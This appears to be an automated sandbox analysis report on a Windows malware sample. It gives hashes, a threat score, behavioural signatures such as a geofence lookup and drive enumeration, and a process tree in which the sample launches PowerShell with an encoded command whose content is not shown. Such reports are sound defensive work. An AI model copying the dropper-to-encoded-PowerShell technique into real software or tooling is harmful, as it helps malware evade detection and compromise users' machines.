Analysis

  • max time kernel
    79s
  • max time network
    82s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    25-12-2022 10:32

General

  • Target

    SecuriteInfo.com.Variant.Marsilia.2083.9036.16697.exe

  • Size

    5KB

  • MD5

    76a7ebc14b56ff57b127630fa4d10df4

  • SHA1

    b8641767f98da027ded8472ee43a7fa01e4855fb

  • SHA256

    fac5d98032b75f647d81a2e6ba452be1ffe03ea4293641db6d1bc68d7c23a3ad

  • SHA512

    818750af409f30426c26b8e5c5e8ef25faa13486bad738619d85c72bf09c2e2943efde13764e0a28d8cab5dda0ed5cbad3afbe66d01bb7e58d3d23f455243aa7

  • SSDEEP

    96:y879lZCFmOKd4Xthbvk+I0AY0sxvk+Iz8Bv8d3ojGrl:yK9loFZKdmfvkTYJvkZW8d7

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Marsilia.2083.9036.16697.exe
    "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Marsilia.2083.9036.16697.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4916
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1696

Network

MITRE ATT&CK Enterprise v6

Downloads

  • memory/1696-135-0x00007FFABAA90000-0x00007FFABB551000-memory.dmp
    Filesize: 10.8MB
  • memory/1696-136-0x0000014F7FA40000-0x0000014F7FA62000-memory.dmp
    Filesize: 136KB
  • memory/1696-137-0x00007FFABAA90000-0x00007FFABB551000-memory.dmp
    Filesize: 10.8MB
  • memory/1696-138-0x00007FFABAA90000-0x00007FFABB551000-memory.dmp
    Filesize: 10.8MB
  • memory/4916-132-0x0000000000440000-0x0000000000448000-memory.dmp
    Filesize: 32KB
  • memory/4916-134-0x00007FFABAA90000-0x00007FFABB551000-memory.dmp
    Filesize: 10.8MB